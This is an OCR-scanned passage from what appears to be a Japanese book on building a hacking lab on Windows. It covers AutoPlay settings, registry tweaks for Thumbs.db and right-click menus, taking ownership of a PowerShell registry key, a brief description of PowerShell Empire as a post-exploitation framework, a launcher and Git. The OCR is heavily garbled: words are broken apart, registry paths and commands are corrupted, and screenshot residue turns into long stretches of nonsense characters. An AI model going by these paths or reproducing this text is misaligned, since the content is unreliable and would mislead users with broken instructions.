3-19 AuitoPlay の 通知 と 自動 再生 画面 


*14 : Windows 7 で は 、 通 知 は 表示 きれ ず に 、 自 動 再生 画面 が 表示 され ます 
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自動 再生 画面 か ら 挿入 時 の 操作 を 一 度 指定 する と 、 同 じ デ バイ ス を 挿入 し た と 
き に その 操作 が 自動 的 に 適用 きれ て し まい ます 。 初回 挿入 時 に は 安全 で あっ て も 、 
次 回 挿入 時 に は 安全 で ある と は 限り ませ ん 。 そ こ で 、 挿 入 時 に は 毎回 、 自 動 再生 
画面 を 表示 する よう に し た 方 が よい と いえ ます 。 

その た め に は 、 設 定 画面 で | デバ イス 」 > | 自動 再生 ] を 選び 、 リ ムー バブル 
ドラ イブ と メモ リー カー ド の 項目 で | 毎回 動作 を 確認 する 」 を 選び ます 。 


沙 AutoPlay を 無効 に する 


自動 再生 画面 が 急 に 出 て くる と 、 操 作 ミ ス に よっ て 、 間 違っ た 操作 を 適用 し て 
し まう 可能 性 が あり ます 。 こ れ を 解決 する に は 、 設 定 画面 で 「 すべ て の メデ ィ ア 
と デバ イス で 自動 再生 を 使う を オフ に し ます ( 図 3-20)。 

これ で USB の スト レー ジ を 接続 し て も 、 通 知 さ きえ 表 示さ れ ま せん 。 ス トレ ー ジ 
内 に アク セス し た い 場 合 に は 、 自 ら マ イコ ンピュータ を 開い て アク セス し ます 。 


目 動 再生 


っ | | て の メデ ィ ア と デバ イス で 自動 生 を 使 
@⑯ つ うわ 


目 勤 再生 の 既定 の 選択 
リム - 江 ブル ド う イナ 


中 ブリ ツタ ー と スキ ャ ナー 毎回 懲 作 を 古 康 する ン 


円 マメ 


アルバ イス 


咽 Bluetooth と その 他 の アル イス 


メモ リ カー ド 
ーー 


入力 
関連 設定 
(あま 。 ペッ と WIndOws In 所 定 の アプ リ の 届 定 


( め 自動 再生 


件 同 が あり ます が か? 
へ ルプ を 表示 


月 UGB 





図 3.20 自動 再生 を オフ に する 
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3 -12 | 共有 フォ ル タ ダー の al9lile に 6|e 呈 ルク 





| 作成 を 抑止 する 


"Thumbs.db' フ ァイル は 、 エ クス プロ ー ラ ー で 画像 や 動画 ファ イル の サム ネイ 
ル を 表示 する た め の 情 報 を 保持 し て いる キャ ッシュ で す 。 シ ステ ムリ ソー ス を 使 
うこ と な く 、 サ ムネ イル を 表示 する こと を 目的 と し て いま す 。 

LAN 内 の 共有 フォ ル ダ ー に く と 、"Thumbs.db" が 勝手 に 作成 され ます 。 この 
ファ イル が 作成 され る と き 、 対象 の ファ イル や フォ ル ダ ー が ロッ ク さ れ て し まい 、 
揉 作 に 若干 の 影響 が 出 ・ し うこ と が あり ます 。 

レジ スト リ の 値 の デー タ を 変更 する こと で 、"Thumbs.db' の 作成 を 抑止 で きま 
- ( 表 3.5)。 


表 3.5 抑止 の た め の レ ジス トリ 


キー HKEY_ CURHENT_USERH\Software\Microsoft\Windows\ 
CurrentVersion\PolicieS\Explorer 


値 の 名 前 DisableThumbnailsOnNetworkFolders 


| 値 の ヌ ョ タ | 0 (作成 する )、1 (作成 し な い ) 
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レア ルン ルン ルソン チコ ウッ レ 人 4 そそ も と 


も まま まま まま えも えも ええ まお も よ よ よ 。 


カス タマ イス する 


石 ク リッ ク の メニ ュー を カス タマ イズ する こと で 、 ア プリ の 起動 を 高速 化 で き 
ます 。 





[送る | メニ ュー に 追加 する 
よく 使う プロ グラ ム や フォ ル ダ ー の ショ ー ト カッ ト を 「 送 る メニ ュー に 登録 
し て お く と 、 探 作 が 便利 に な り ま す ( 図 3-21)。 


鞭 く (0] 

ブレ ビュ ー(") 
コ COmnt WU Plof 
ニー ニュ ーー デス クト ッ プ の 畜 拓 と し て 主計 了 B) 
= 関 に 
PR 還 し に 。 
76pm Oper with 5ublme Test 

OpCT In RBOare2 


所 1 ?5 Pe 
174. pm Opon In Radars2 OcDLDs「 


誠 1 は Pm 避 可 り に 回 (K) 
誠 172.Pm な 回 り に 画 転 (N] 
まま 71Pm 

誠 170.Pm 

2 CRC 下 


和 ま 160.pmw 
チ パ 雇 スキ で ン [5] 1ZQ.pn0 


ココ 166、prs % た | 〒 て 
Jo7 pe ツ AVG を し て は 河 す る 


有 ま 165pm 記 共有 
誠 )05.Prw Dopbox リン を コピ ー 【L) 
ま 1043.Pm propbox_com で 表 去 〔【D) 
誠 )63Pm パー ジョ ン 因 厩 
ま 162.pm コメ ント を 表 下 
ま 61.pm 
誠 60pm “ 
大 159pm 茜 到 ぶ ) 
ま 158.Pms F』 聞 (」] 
ま 17 門 。 フロ グラ ム か 5 賠 く (H) 
まま 156.Pm 

選 の 東 キ TewftOgeGit 


| XX ち }3 





ィ <ZiD 


Hex EMI with Her WOritgnp v6.8 


| WWni4erge 

以前 の バー ジョ ン の 軍 元 (VI 

世 る (N) 
の り 仔 り () Gyfoakrs 
ュ っ ピー(C) ES ( 転 直 」 

デス クト ッ プ (ショ ー ト カッ ト そ 作 克 ) 

ショ ー ト カル 。 ト の 相 記 (5) を ドキ ュ メ ント 
WWD) 3 


名 の ま 要 (IM) DVD RW ドラ イブ (EE) 





ID 
コ ド 


図 3.21 |「 送 る] メニ ュー 


| 送る] メニ ュー に 登録 する に は 、SendTo フ ォ ル ダー に プロ グラ ム や フォ ル 
ダー の ショ ー ト カッ ト を 配置 し ます 。 SendTo フ ォ ル ダー に アク セス する に は 、 
「 ファ イル 名 を 指定 し て 実行 」 画面 に て 、shellsendto を 入力 し ます 。Windows 7 

10 で は 、C:\Users\< く ユー ザー 名 >\AppData\Roaming\Microsoft\Windows 
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\SendTo に な り ま す 。 


効 右 フ リッ フク の メニ ュー に 項目 を 追加 する 

ファ イル や フォ ル ダ ー の アイ コン を 選択 し た まま 、 あ る い は 何 も な い 場 所 で 石 
クリ ッ ク す る と 、 そ れ ぞ れ に 対応 する メニ ュー が 表示 され ます 。 表 示す る 情報 は 
レジ スト リ に 保存 きれ て いる の で 、 レ ジス トリ を 追加 、 削除 、 編集 する こと で 、 右 
クリ ッ ク の メニ ュー を カス タマ イズ で きま す 。 

[送る] メニ ュー の 登録 より も 手間 は か か り ま す が 、「 送 る ] メニ ュー より 上 位 
に 表示 され る の で アク セス の 効率 が 向上 し ます 。 


免 ファ イル を 右 ク リッ ク し た と き の メ ニュ ー 


表 3.6 ファ イル の 場合 


キー | HKEY_CLASSES_ROOT\"\shell\< コ マン ド 名 > 


| 値 の メニ タ | 実行 し た い コ マン ド の パス と 引数 


"HKEY_CLASSES_ROOT 半 "shel\< コ マン ド 名 > の 値 が 設定 され て いな い 
場合 は 、 メ ニュ ー に < コマ ンド 名 > が 表示 され ます 。 ま た 、"HKEY_CLASSES_ 
ROOT\*\shel\< コ マン ド 名 >” の 値 が 設定 され て いる 場合 は 、 そ の 値 が 表示 さ 
れ ま す 。 

コマ ンド の 引数 と し て 、 右 クリ ッ ク し た ファ イル の パス を 指定 する 場合 に は 
"961" を 指定 し ます 。 例え ば 、|C:\App\app.exe '%1'」 の よう に な り ま す 。 





免 フォ ル ダ ー を 右 ク リッ ク し た と き の メ ニュ ー 


表 3.7 フォ ル ダ ー の 場合 


| HKEY_CLASSES_ROOT\Folder\shell\< コ マン ド 名 > また は HKEY_ 
CLASSES_ROOT\Directory\shell\ く コマ ンド 名 > 





| 実行 し た い コ マン ド の パス と 引数 
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コマ ンド の 引数 と し て 、 有 クリ ッ ク し た フォ ル ダ ー の パス を 指定 する 場合 に は 
"961 を 指定 し ます 。 


⑱ ドラ イブ を 右 ク リッ ク し た と き の メ ニュ ー 


表 3.8 ドラ イブ の 場合 


キー | HKEY_CLASSES_ROOT\Drive\shell\< コ マン ド 名 > 


COmmand 





実行 し た い コ マン ド の パス と 引数 


コマ ンド の 引数 と し て 、 右 クリック し た ドラ イブ の パス を 指定 する 場合 に は 
961 を 指定 し ます 。 


人 何 も な い 場 所 を 右 ク リッ ク し た と き の メ ニュ ー 


表 3-9 何 も な い 場 所 の 場合 


キー HKEY_CLASSES_ROOTYDirectory\Background\shelIl\< コ マン ド 名 > 





実行 し た い コ マン ド の パス と 引 逢 


沙 フォ ル ダ ー を 右 フ リッ ク し た と き に コマ ンド プロ ンプ ト を 表示 する 
「 単 に 右 ク リッ ク し た と き の メ ニュ ー」 と 「[Shift] キー を 押し な が ら 右 クリ ッ 

ク し た と き の メ ニュ ー」 に は 若干 の 差 が あり ます 。 レ ジス トリ に Extended が あれ 

ば 、[Shift] キー を 押し な が ら 右 クリ ッ ク し た と きだ け に 表示 され ます 。 
Windows 10 で は 、 図 3.22 の よう な 差 が 生じ ます 。 
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(単に 右 ク リッ ク し た と き )〉 《([Shiftl キー を 押し た と き ) 


ウッド 2 で 人 <@ 
クイック アク ぜ ス トビ ツ 凛 の 新しい ウイ ドウ で 英 く IE 
日 Windows Ocfcnder で スキ ャ ン す まう クイ ッ ク テクス ヒビ ツ 民 の 
ーー マーーーー 一 べ | poaocal ウィ ンド 2 を ここ に 図 く S 


アク ヤス も 科す 
以 続 バー ジン の 遼 元 (VI 
ライ ナブ! に 生 加 0 

スタ ー ト に ビン 還 め すう ( り 


】 Wandiows Dofon3ei で スキ ャ ン す る - 


アウ セ 2 ま 符 可 すき 
前 の ポー ジョ ッ の あほ 
ライ ブラ ! に 店 剤 人 
スク ー ト に ギン 固め する (P 
2 の 平 - ぬ Al 
赴き (WM 
ゆり 9D 
3 ど -(① 
ショ ー ト の っ ト の 作 所 (る 
二 4I ロ 
才 る 前 の 評 完 (Mi 
プロ リティ) 


図 3.22 右 ク リッ ク の メニ ュー の 差 


二 SIO 

人 り 取り ① 

補 - 全 

ショート カッ ト の 作成 





[Shit] キー を 押し た と き の メ ニュ ー に は 、「PowerShell ウ ィ ン ド ウ を ここ に 開 
く 」 と いう 項目 が あり ます (?15)。[Shift] キー を 押さ なく て も これ が 表示 され る 
よう に カス タマ イズ する 方 法 を 紹介 し ます 。 


代 Windows 10 の 場合 


HKEY_CLASSES_ROOT\Directory\shel\Powershell に ある Extended と い 
う 文字 列 値 ( 図 3.23) を 削除 すれ ば よい わけ で す が 、 ア クモ セス 権 限 の 問題 か ら 次 に 
示す 手順 で 行い ます 。 


し ジス トリ エディ ター 
フイ MFI 揚 索 加 則 示 (WV お 気に入り (Al ヘル 刀 H 
- 信 


REG SZ 人 せ gnrll32.dil -8508 
EEG_S 


紀 |ShowBssedOnveociia REG DWORD DOO53Sb<8 (6527AC) 


) 。、DasiiMlanaoementConr 
1 》 凍 OkManseewentPat 


1 まもる = ニー ニーーーー 一 


20 コ 
< 5 還 当 > 





3-23 削除 し た い 値 Extended 


*15 : Windows 7 で は | コマ ンド ウィ ンド ウ を ここ に 開く 」 と いう 項目 に な っ て いま す 。 
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1 「Powershell の アク セス 許可 」 画面 を 開く 

HKEY_ CLASSES_ROOT\Directory\shell\Powershell キー を 右 ク リッ ク し 
て 、| ア クセ ス 許 可 」 を 選び ます 。 す る と 、|Powershell の アク セス 許可 」 画面 が 
表示 され ます ( 図 3-24)。 


PowershelI の アワ で ス 許 可 


セキ ュ リ ティ 
クリ ルー ブ 名 また は ユー ザー 名 [Gi: 


国 不 有 な アカ ウツ ト S-1- 15-3- 1024- 1055355936- 1281604716-3511738.。 
和 i SYSTENM 

味 Adminirtrotorr (DESKTOP-EGUBLOSXAdmynisratoo) 

計り ze (DESKTOP-EGUBLOSYU>=rs) 


放 Truztedinztaler 
| 過 加 (DI.- | 入隊 (R) 
炎 き 





アリ ゼス 許可 (Pi: ALL APPLICATION 
PACXAGES 


フル コット ロール 
迄 取り 
特攻 な アク セス 放 可 


特 米 な アク ゼス 許可 また は 詩 結 設定 を 天 示 する 
に は 、 【 詩 細 訪 定 ] を ウリ ッ ク し さす 。 





3-24 「Powershell の アク セス 許可 画面 


ここ で Administrators に フル コン トロ ー ル の 許可 を 与え を る こと が 目標 に な り ま 
す 。 し か し 、 チ ェ ッ ク を 入れ て 設定 を 反映 し よう と し て も 、|「 ア クセ ス が 拒否 され 
まし た 」 と いう エラ ー に な り ま す 。 こ れ は 、 こ の キー の 所 有 者 が TrustedInstaller 
に な っ て お り 、TrustedInstaller は Administrators より 権限 が 高い た めで す 。 


② 所 有 者 を 確認 する 
「 詳細 設定 」 画面 か ら 、 所 有 者 が TrustedInstaller で ある こと を 確認 で きま す ( 図 
3-25) 。 
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、Powrershell の セキ ュ リ ティ の 半 細 区 


所 有 者 : Tnistedlnstaller 証 訓 ロ 


| アウ ヤス 次 可 覧 友 。 有効 な アク セス 


笠 細 に つい て は 、 アウ ゼス 許 コ エン トリ を ダブ プル クリック し て (だ さい 。 クセ ス 許 可 エ ント リ を 変更 する に は 、 エン トリ を 店 択 し 、 |[ 需 集 ] (使用 で さる 場合 ) を ウリ リック し ます 。 


アグ ゼス 詩 司 エン ト 


竹宮 プリ ッッ パル アク セス 
且 基本 Truskedlnstsller フル コツ トロ - ル 
品 計 可 SYSTEM 公 み 至り 
呈 千村 Admanstrators (DESKTIOP-EGUBSLOS-。 気 み 到 り 
計 2 可 Users (DESKTOD-EGUSLOSWUsers) に すす 
に お | ALL APPLKOATION PACKAGES に | 
き 可 不明 な アカ ウッ ト ($-1-15-3-1024-1055.。 甘み 届け 


| 追 誠 O) | 還 玲 導 四球 


鉛 用 先 

この キー と サナ キー 
この き キー ト サ ガ キー 
この キー と サガ キー 
この キー と サブ キー 
この キー と サイ キ ー 
この キー と サブ キー 


[| コ 了 チオ ブ ジ ェクト の アウ ゼス = キ 選 エン トリ すべ て を 、 この オプ ジェ クト か うら の 連 務 可 能 な アク ゼス 許可 ェ ン トリ で 吐き 生え る び P) 


3-25 所 有 者 を 確認 する 





[__oK | キャ > セル | 議 計 還 可 記 


3③)Administrators に フル コン トロ ー ル の 許可 を 与え る 


所 有 者 の 「 変 更 ] リン ク を 押し て 、 さ ら に 
[詳細 設定 ] ボタ ン を 押す と 、「 ユー ザー また は 
グル ー プ の 選択 」 画面 が 表示 され ます 。 [検索 」 
ボタ ン を 押し て 、 検 索 結 果 の |「Aqdministrators」 
を 選ん で [OK] を 押し ます C16)。 こ れ で 所 有 
者 が 変更 に な り ま し た 。 

[Powershell の アク セス 許可 」 画面 まで 戻り 、 
Administrators の フル コン トロ ー ル の 許可 に 
チェ ッ ク を 入れ て 、 反 映 さ せま す ( 図 3-26)。 

以上 で 、 ア クセ ス 許 可 の 設定 が で きた の で 、 
レジ スト リエ ディ ター に て Extended と いう 値 
を 削除 し ます 。 削除 後 、 フ ォ ル ダー を 選択 し た 


せ キ ュ リ アァ ィ 


クルー 7 も まで 記 ユ ー ザ ー も GO 

! 細 AULAPPLUCATION PACKACES 

不明 な アカ ウノ ト IS-1- 1 て 3- 1094- YO055 55036. 91906047 06- 351173 ま ., 
縺 SYSTEM 

半 Admartmtoc IDESKTDP-EGUSLOSWA3menifrsto) 

計 ye (DESKTOP-EGURL OSYUxmi 

話 ructsgrstsler 


介入 な アフ セス 引 ま た は 半生 旭 で を 雪 二 すう | 府 記 油 定 W | 
に は 、 | 評 時 玉 定 | そ ク リッ クル し ます 。 





|L_K |]| woek | WO | 


3-26 Administrators に フル コン ト 
ロー ル の 許可 を 与え る 


*16 : Administrator で は な く 、"Administrators で ある こと に 注意 し て くだ さい 。 
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まま 有 クリ ッ ク し て 、 メ ニュ ー に 「PowerShel ウ ィ ン ド ウ を ここ に 開く 」 と いう 
項目 が 表示 され る こと を 確認 し ます 。 

これ が うま くい っ た ら 、 同 様 の 作業 を 次 の レジ スト リ に 対し て も 行い ます 。 こ 
れ に より 、 ド ライ ブ な ど に 対し て も 同様 の 動作 が 適用 きれ ます 。 


* HKEY_ CLASSES_ROOT\Drive\shell\Powershell キー の 値 Extended を 削 
除 す る 。 

* HKEY_ CLASSES_ ROOT\Directory\Background\shell\Powershell キー の 
値 Extended を 削除 する 。 


@ Windows 7 の 場合 

[Shift] キー を 押し な が ら 右 クリ ッ ク す る と 、 メ ニュ ー に 「 コ マン ドウ ィ ン ド ウ 
を ここ に 開く 」 と いう 項目 が あり ます 。 

上 記 の 方 法 を 次 の レジ スト リ に 対し て も 行う こと で 、 コ マン ド プ ロン プ ト で も 
同様 の こと が で きま す 。 


* HKEY CLASSES_ ROOT\Directory\shell\cmd'" キー の 値 Extended を 削除 
する 。 

* HKEY CLASSES ROOT\Drive\shell\cmd'" キー の 値 Extended を 削除 する 。 

* HKEY_CLASSES_ROOT\Directory\Background\shell\cmd キー の 値 
Extended を 削除 する 。 


た だ し 、Windows 7 の 場合 は 、 ア クセ ス 許 可 を 設定 する こと な く 、FExtended を 
削除 で きる こと が あり ます 。 
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特殊 な フォ ル ダ ー を すばやく 開く 


[ファ イル 名 を 指定 し て 実行 」 画面 に て 、 shell コ マン ド を 用 いる こと で 、 コ ロン 
の 後に 指定 し た 名 前 か ら 特 殊 な フォ ル ダ ー を エク スプ ロー ラー で 開け ます 。 こ の 
と き 、 大 文字 ・ 小 文字 は 区 別 さ れ ま せん ( 表 3-10) 。 


表 3-10 特殊 な フォ ル ダ ー を 開く コマ ンド 

| コマ ンド =。。。0 0 | フォルダ ー。 0 5 WW 
アプ リケーション デー タ (%AppData%) 

デス クト ッ プ ( 全 ユ ー ザ ー 共 通 ) 

デス クト ッ プ (ユー ザー 個別 ) 

lshelESendfo =。。 | 送る WW 
スタ ー ト アッ プ (ユー ザー 個別 ) 
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「 スト レー ジ 分 析 ソ フト で 





す 14 人 駄 な ファ イル を 洗い 出す 


Windows 10 に は 、 ス トレ ー ジ 分 析 ソ フト が 最初 か ら 備 わっ て いま す 。「 設 定 画 
面 ボ > | シス テム |」 > | ストレージ 」 か ら 、 分析 し た い ド ライ ブ を 選び ます 。 分 
析 が 終わ る と 、 タ イプ 別に スト レー ジ の 使用 容量 が 表示 され ます ( 図 3-27)。 
さら に 、 そ れ ぞ れ の タイ プ を 押す と 、 便 用 容量 で ソー ト さ れ た 状態 で 、 フ ォ ル 


い ー 


ダー の 一 覧 が 表示 され ます 。 


人 @ PC (C:) - 231 GB 


スト レー ジ 使 用 重 


その 1 

ジス ナム と 子 約 済み 
時 ファ イル 

アブ リ と ゲー ム 


アス クト ッ ブ ナブ 





図 3.27 Windows 10 の スト レー ジ 分 析 


より 詳し い 分 析 を し た い 場 合 は 、 サ ー ド パー ティ ー 製 の スト レー ジ 分 析 ソ フト 
を 用 いま す 。 例 えば 、WinDirStat で あれ ば 、Windows 7 で も 動作 し 、 Windows 10 
の スト レー ジ 分 析 よ り も 詳細 に 表示 され ます ( 図 3-28)。 





/ 
| WinDirStat - Windows Directory Statistics 


| https://windirstat.net/index.html 
、 
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図 3.28 WinDirStat で の スト レー ジ の 分 析 結 果 


"Svchost.exe" の 正体 


タス クマ ネー ジャ ー を 開く と 、 プ ロ セ ス 一 覧 に "svchostexe" が た くさ ん 表示 さ 
れる こと が あり ます 。 "syvchostexe は ネッ トワ ー ク 関連 の 基本 的 な サー ビス を 起 
動 す る 親 プ ロモ ス で す 。 ネ ットワーク プロ グラ ム の 多く は この プロ モス を 起動 す 
る た め 、 プ ロモ セス 一 覧 に た くさ ん 表示 され る の で す 。 

この 特性 を 悪用 し て 、 不 正 な プロ グラ ム は あえ て "svchost.exe' や 類似 し た 名 称 
を 使う こと が あり ます 。 
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PowerShell の すす め 


PowerShell は Windows 7 か ら 備わっ た 機能 で す 。 従来 の コマ ンド プロ ンプ ト よ 
り 複 林 で す が 、 そ れ と 同時 に 強力 な 機能 が 備わっ て いま す 。 PowerShell で は 、 コ 
マン ド プ ロン プ ト で 使え る コマ ンド は ほぼ 利用 可能 で あり 、 加 えて Linux の シェ 
ル の よう な こと が で きま す 。 

従来 の Windows で は 、 コ マン ド プ ロン プ ト の み を 備え て いま し た 。 コ マン ド プ 
ロン プ ト 向 け の スク リプ ト と し て 、 コ マン ド の 組み 合わ せ で 構成 され る バッ チ ス 
クリ プ ト が 用 いら れ ま し た 。 

その 後 、 Windows の 進化 に より 、Windows の 機能 を COM や WMI と いっ た API 
を 介し て 利用 で きる よう に な り ま し た 。 こ れ を 利用 する た め に 、Windows Script 
Host と いう スク リプ ト 実 行 環境 が 提供 され まし た 。 

近年 は 、.NET Framework と いう API が 新た に 提供 され まし た 。 こ れ を 利用 す 
る た め の ス クリ プ ト ラ 基盤 と し て 、PowerShell が 登場 し まし た 。 

本 書 で は 、pmg や jpconfig 程 度 し か 使用 し て いな いた め 、 軽量 で 起動 が 早い コマ 
ンド プロ ンプ ト を 用 いて いま す 。 一 方 、 シ ステ ム の 管理 ・ 運 用 の 業務 に お いて は 、 
PowerShell の 方 が 圧倒 的 に 使い 勝手 が よい と いえ ます 。 リ モー ト 操 作 や サイ レン 
トイ ンス トー ル な ども 実現 で きま す 。 

また 、PowerShell は セキ ュ リ ティ や ハッ キン グ の 場 で も 広く 利用 され 始め て い 
ます 。PowerShell Empire (https://www.powershellempire.com/) は 、 そ の 名 の 
通り PowerShell を 積極 的 に 用 いて いま す 。 PowerShell Empire は 、 攻 撃 後 刑 フ 
レー ム ワ ー ク の 一 種 で あり 、 侵 入 後 (post-exploitation) に 用 いら れる 様々 な モ 
ジュ ー ル を 実装 し て いま す 。 PowerShell 自体 が Windows 上 に 最初 か ら 存 在 す る も 
の で あり 、 な お か つ PowerShell スクリプト の ファ イル は 端末 上 に 保存 せ ず に メモ 
リー 上 で 実行 で きる た め 、 ア ンチ ウイ ルス で の 検出 が 難し いと され て いま す 。 そ 
うい っ た 意味 で 、 今 後 の 攻 撃 に PowerShell が 用 いら れる ケー ス は 増加 する と 予想 
され て いま す 。 よ っ て 、 ハ ッ キ ング の 技術 を 深め て いく うえ で 、PowerShell に 対 
する 理解 は 必須 項目 と な りつ つ あ り ま す 。 
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3-15| ラン チャ ー を 導入 する 





Kali の 場合 は 、Termmal か ら ほ と ん どの アプ リ を 起動 で きま す 。 こ の よう に 、 
OS に 備わっ て いる 機能 で アプ リ を すぐ に 起動 で きれ ば よい の で す が 、Windows 
の 場合 は まだ まだ 使い や すい と は いえ ませ ん 。 デ スク トッ プ や タス ク バ ー に 
ン ョ ー ト カッ ト を 作れ ば よい と いう 考え 方 も あり ます が 、 機 能 別に グル ー プ 化し 
に くい と いえ ます C で 17)。 

ハッ キン グ ・ ラ ボ で は 、 ど うし て も 使用 する アプ リ が 多く な り ま す 。 日 常に お 
ける 作業 に 加え て 、 ハ ッ キ ング や プロ グラ ミン グ の アプ リ が どう し て も 必要 に な 
り 、 管 理 す べき 対象 が 増え て いき ます 。 

と うい っ た 所 本 を 休 決 する の が ラン チャ ー で す 。 ラン チャ ー は 、 アプ リ を 凍 昌 
に 起動 する た め の ソ フト ウェ ア で す 。 多く の 場合 は 、 ア プリ を グル ー プ 化 で き 、 ア 
イィ コン 表示 され る の で マウ ス で 起動 で きま す 。 特殊 な ラン チャ ー と し て 、 コ マン 
ドラ イン 型 も あり ます 。 

様々 な ラン チャ ー が 存在 する の で 、 好 み の も の を 選択 し て 問題 あり ませ ん が 、 
必 な く と も 次 の 機能 を 備え を て いる も の を 選び まし ょ う 。 シ ンプ ル 重 視 な ら ボ タン 
型 ラ ンチ ャ ー、 見 た 目 重視 な ら ド ッ ク ラ ンチ ャ ー が よい で し ょ う 


機能 別に グル ー プ 化 で きる 
管理 者 権限 で の 起動 に 対応 し て いる 。 
*・ ア プリ だ け で な く 、 フ ァイル や フォ ル ダ ー る も 登録 で きる 。 


燃 CLaunch に つい て 
ここ で は ボタ ン 型 ラン チャ ー で ある CLaunch を 紹介 し ます 。 


「 \ ヽ 
Pyonkichis page 
http://hp.yectorco.jP/authors/ VA01S351/ 

Rs 
CLaunch は Windows 7 / 8/ 10 で 動作 する フリ ー の ラン チャ ー で す 。 デ フォ ル 

ト で は [Ctrl] キー を 連続 で 2 度 押 すこ と で 起動 で きま す 。 そ の 際 、 マ ウス ポイ ン 


*17 : Windows 7 で は 、 タ スク バー に に フォルダー の ショ ー ト カッ ト を 店 け ま せん 
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タ の ある 場所 に ラン チャ ー が 開き ます 。 管理 者 権限 で の 起動 、URL や フォ ル ダ ー 


の 登録 も る で きま す ( 図 3.29、 図 3-30)。 
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図 3.29 CLaunch を 開い た と ころ 


ポタ ン の プロ バ パティ 


名 本 ( 沿 arpGu reFree 


ファ イル 宮 F CxPeeam FieseBuFFudeFrecWBlhpSJteFreeexe | 須 且 1B)。。 





パラ ォ ュー パタ (PP) | 
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実行 時 大 ささ [WW | 軒 計 24 ドウ ワ 

坦 江 店 (RON 

特権 し バル E 

ーッ ゴ ( 1) 


ツ ョ ーー + オ ッ ト 〒 ーー KJ) 


ホッ トー[HI 


EETIE」 
共に 下 和 し て いる 場合 0 赴 (Oj の) 
9 も 全 徐 | 同時 評 委 P1TbtA- | 
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図 3.30 ショ ー ト カッ ト の 設定 画面 
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3-16. ハッ キン グ ・ ラ ボ に お ける Git 





類 Git と は 

Git と は 、 バ ー ジ ョ ン 管 理 シ ステ ム の 1 つ で 、 分 散 型 と いう 特徴 を 持ち ます 。 
ファ イル の 状態 を 好き な タイ ミン グ で 履歴 と し て 記録 し て お け ま す 。 そ の た め 、 
編集 し た 後 の フ ァイル を 過去 の 状態 に 戻し た り 、 編 集 し た 箇所 の 差分 を 表示 し た 
り で きま す 。 

本 項 で は 、 ハ ッ キ ング ・ ラ ボ に お ける Git に つい て 解説 し ます 。 

Git ャ ーー ツー 款 に つい て は 、 本書 の 内 容 を 超え る の で 触れ ませ ん 。 Git に 
関す る 書籍 は 多数 出版 され て いま す 。 閉 泳社 か ら も 数 冊 出 版 さ れ て いま す 。 こう 
いっ た 書籍 や Web の 情報 で 学習 する こと を お すす めし ます 。 

「 
独習 Git」 
https://wwwshoeisha.co.jp/book/detail/9784798144610 
詳 
「 エ ンジ ニア の た め の Gik の 教科 書 実践 で 使え る ! 
ー ジ ョ ン 管 理 と チー ム 開 発 手法 」 


https://wwwrshoeisha.co.jp/book/deta 山 /978479814366S 
い 


ー- ーー 


Y7 


誠 ハッ キン グ ・ ラ ボ の 観点 で の Git の 有効 性 

ここ で は ハッ キン グ ・ ラ ボ の 構築 ・ 運 用 に お ける 観点 で Git の 有効 性 に つい て 解 
説 し ます 。 

ハッ キン グ に つい て 学習 し て いく 過程 で 、 サ ンプ ルプ ログ ラム や 自作 の プロ グ 
ラム が た まっ て いき ます 。 ゼ ロ か ら す ぐに 作り 出せ る 能力 が あれ ば よい の で す が 、 
な か な か そう は いき ませ ん 。 過去 に 扱っ た プロ グラ ム を 一 元 管理 し て お く こ と で 、 
必要 な 場面 で すぐ に 探し 出せ ます 。 つ まり 、 過 去 に 学習 し た 内 容 を 資産 と し て 将 
来 に 役立て る と いう こと で す 

プロ グラ ム を 単純 に フォ ル ダ ー 管 理 す る と いう アプ ロー チ も あり ます が 、 す で 

に 動作 し て Hg 
ん 。Git で 管理 し て お け ば 、 す ぐに 以前 の 状態 に 戻せ る の で 、 積 極 的 に プロ グラ ム 
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を 修正 ・ 改 造 で きま す 。1 人 で 開発 し て いて も 、 リ ファ クタ リン グ (*18) し た り 、 
改良 し た りす る こと で モチ ベー ショ ン を 高め る こと も で きま す 。 


沙 プラ イベ ー ト リポ ジ ト リ で プロ グラ ム 資 産 を 管理 する 

前 述 の よう に 、 ハ ッ キ ング ・ ラ ボ を 運用 する と 、 様 々 な プロ グラ ム を 扱う こと 
に な り ま す 。 実験 する た びに プロ グラ ム が どん どん 増え て いく こと に な り ま す 。 
そう し た プロ グラ ム を きち ん と 整理 し つつ 、 一 元 管理 し て お か な いと 、 人 後 で 流用 
する こと が 困難 に な り ま す 。 

そこ で 、 本 書 で は 実験 用 の プロ グラ ム を イン ター ネッ ト 上 の プラ イベ ー ト リポ 
ジ ト リ で 管理 し ます 。 

イン ター ネッ ト 上 で 管理 する こと で 、 バ パッ クア ッ プ を 実現 し つつ 、 メ イン PC が 
な く て も アカ ウン ト に ログ イン さえ で きれ ば プログ ラム を 入手 で きま す 。 

プラ イベ ー ト リポ ジ ト リ で 管理 する の は 、 次 の 2 つの 理由 か ら で す 。 


IL サン プル プロ グラ ム で あれ ば 、 著 作 権 の 観点 か ら 勝 手 に 外部 に 公開 で き な い か 
ら で す 。 

II. 独自 の プロ グラ ム で あっ て も 、 ハ ッ キ ング に 関す る も の で あれ ば 不正 指令 電磁 
的 記録 ( 俗 に いう ウイ ルス 作成 罪 ) の 観点 か ら 不 用 意 に 他人 に 公開 で き な い か 
ら で す 。 


誠 Git に 関す る フォ ル ダ ー の 構成 例 
例え ば 、Git に 関す る フォ ル ダ ー を 次 の よう な 構成 に し ます (19)。 





C:\Dropbox\G1t\hacking- 1ab\ 


Dropbox フォ ル ダ ー 内 に する こと で 、Dropbox の 管理 下 に 入り ます 。 ま た 、Git 
に 関す る フォ ル ダ ー で ある こと を 明示 する た め に 、Git フ ォ ル ダー に し まし た 。 


*18 : プロ グラ ム の 外部 的 な 振る 舞い を 保ち つつ 、 ソ ー ス の 内 部 構造 を 整理 する こと で す 。 


*19 : あく まで 本 書 で の 例 で あり 、 好 み の 構 成 で 構い ませ ん 。 Dropbox を 使う つも り が な けれ ば 
C:\Git そ hacking-lab そ "\、 デ ー タ 用 の D ド ライ プ が あれ ば "D:\Dropbox\Git\hacking-lab そ "で も 
よい で し ょ う 。 た だ し 、 本書 の 目的 の 1 つ は 「 い つ で も どこ で も ハッ キン グ 」 な の で 、 メ イン PC 
に 内 滅する か 、 常 に 接続 する 記憶 媒体 に Git 用 の フォ ル ダ ー を 作る こと を お すす めし ます 。 
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hacking-lab は ハッ キン グ ・ ラ ボ の リボ ジ ト リ 名 で す 。 も し 、 独 自 に プロ グラ ム を 
開発 し て 、 外 部 に 公開 し た りす る の で あれ ば 、Git フォ ル ダ ー 内 に その リボ ジ ト リ 
名 の フォ ル ダ ー を 作れ ば よい で し ょ う 。 

